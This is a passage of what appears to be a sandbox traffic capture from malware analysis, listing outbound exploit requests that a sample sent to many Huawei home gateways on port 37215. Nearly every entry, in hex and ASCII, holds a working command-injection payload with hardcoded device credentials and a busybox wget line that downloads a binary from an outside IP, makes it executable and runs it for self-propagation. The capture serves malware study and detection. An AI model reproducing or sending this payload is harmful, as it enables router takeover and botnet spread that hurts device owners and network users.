                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          762192.168.2.2354378133.35.209.7837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.230340004 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          763192.168.2.2349986157.90.54.24237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.230370998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          764192.168.2.2351596160.150.114.18437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.231626034 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          765192.168.2.2347798197.156.17.7037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.231688023 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          766192.168.2.2351170197.188.84.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.231714010 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          767192.168.2.2333902157.102.22.24537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.231739044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          768192.168.2.2358008197.128.83.10637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.231780052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          769192.168.2.234136025.16.94.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.231822014 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          770192.168.2.234692441.177.192.19837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232625961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          771192.168.2.233933841.20.253.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:56.232644081 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
